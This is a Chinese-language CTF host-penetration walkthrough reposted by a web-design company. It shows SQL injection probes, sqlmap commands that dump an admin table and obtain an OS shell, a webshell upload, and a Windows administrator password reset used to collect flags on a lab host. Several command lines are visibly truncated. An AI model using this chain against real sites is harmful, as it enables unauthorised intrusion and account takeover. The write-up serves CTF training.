這篇文章主要介紹了CTF主機滲透的方法是什么的相關知識,內(nèi)容詳細易懂,操作簡單快捷,具有一定借鑒價值,相信大家閱讀完這篇CTF主機滲透的方法是什么文章都會有所收獲,下面我們一起來看看吧。
創(chuàng)新互聯(lián)是一家專業(yè)從事成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營銷網(wǎng)站建設、網(wǎng)頁設計的品牌網(wǎng)絡公司。如今是成都地區(qū)具影響力的網(wǎng)站設計公司,作為專業(yè)的成都網(wǎng)站建設公司,創(chuàng)新互聯(lián)依托強大的技術實力、以及多年的網(wǎng)站運營經(jīng)驗,為您提供專業(yè)的成都網(wǎng)站建設、營銷型網(wǎng)站建設及網(wǎng)站設計開發(fā)服務!
第一步:首先打開連接地址: http://202.0.0.207
第二步:尋找漏洞點,點擊頁面的時候,我們看到是PHP的網(wǎng)站,以及url中的參數(shù)名為cid,那我們可以使用sql注入試試,看是否存在sql注入漏洞
我們使用手工判斷方法:
http://202.0.0.207/product.php?cid=3’, 頁面異常
http://202.0.0.207/product.php?cid=3 and 1=1,正常
http://202.0.0.207/product.php?cid=3 and 1=2,異常
從而判斷此處一定存在sql注入漏洞,且參數(shù)類型為整型。
這里我們可以使用盲注來手工注入。因為sqlmap也支持盲注類型,所有為了節(jié)約時間我們就使用sqlmap來脫庫吧!
第二步:使用sqlmap來脫庫
sqlmap -u http://202.0.0.207/product.php?cid=3
此參數(shù)爆出時間盲注和聯(lián)合注入攻擊可以實現(xiàn)。
接下來我們直接開始跑庫吧
sqlmap -u http://202.0.0.207/product.php?cid=3 –dbs
我們選擇510cms數(shù)據(jù)庫來爆吧
sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms –tables
再來爆510_admin試試
sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns
接下來爆數(shù)據(jù)
sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark –dump
然后我們想要admin用戶的密碼:8dbdf8221fcf4bd6ac5a48317baa948c,在線MD5解密后得到密碼為adminlwphp
第三步:我們接下來就去找后臺登錄頁面了
這里我使用御劍后臺掃描器
首先我們還是看登錄頁面的源碼,看是不是有flag,果然如此,在這里拿到一個flag3{d3eac3a68b7d3863cc7bd45ba948195d}
接下來我們使用爆庫出來的管理員賬戶和密碼登錄:admin/ adminlwphp,登錄成功
第四步:胡亂搗騰
進入后臺后,現(xiàn)在也只有到處去收集有用信息,看下有沒有直接拿flag的地方了。一不小心,突然看到了網(wǎng)站絕對路徑C:/www/,那根據(jù)前面爆出的sql注入漏洞,我們能不能拿到cmdshell呢?我們接下來嘗試一下
sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell
果然拿到了cmdshell,真XX是一個驚喜,那么我們接下就看下現(xiàn)在擁有的系統(tǒng)權限是什么
第五步:一句話木馬上傳及利用
接下來就直接寫入一句話木馬了
echo ^>C:/WWW/shell.php
接下來我們上菜刀工具
連接成功
第六步:胡亂搗騰
下面看到這么多頁面心頭就開始發(fā)慌,又得漫山遍野的去收集flag了,
在網(wǎng)站根目錄發(fā)現(xiàn)flag.php文件,發(fā)現(xiàn)flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}
花了10多分鐘,再也沒有找到flag,那只有想其他的辦法了。在configs中找到config.php,這個是數(shù)據(jù)庫的配置文件,我們得到了數(shù)據(jù)庫連接的賬戶root密碼為windpasssql
我們使用菜刀對數(shù)據(jù)庫進行連接
提交后,連接成功
繼續(xù)看這里有沒有flag,又拿到一個flag=flag2{981c05134c56092b83b3e9c9b4116ac1}
我們使用菜刀工具進入虛擬終端,看下目前的權限是什么,需要提權不?結果發(fā)現(xiàn)是system權限,
執(zhí)行命令netstat -an查看3389端口已經(jīng)開啟
et user administrator godun.f
修改管理員密碼為godun.f,
然后遠程桌面登錄遠程主機
拿到flag=flag4{e97950cb2dea110c53cb599abc826268}
拿到了4個flag,還有一個不知道藏在哪里,我們還得繼續(xù)找,找了半天,最后在,C盤的根目錄下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}
最后,到此為止,5個flag全部找出來了,接下來我們把5個flag放入答題框
關于“CTF主機滲透的方法是什么”這篇文章的內(nèi)容就介紹到這里,感謝各位的閱讀!相信大家對“CTF主機滲透的方法是什么”知識都有一定的了解,大家如果還想學習更多知識,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道。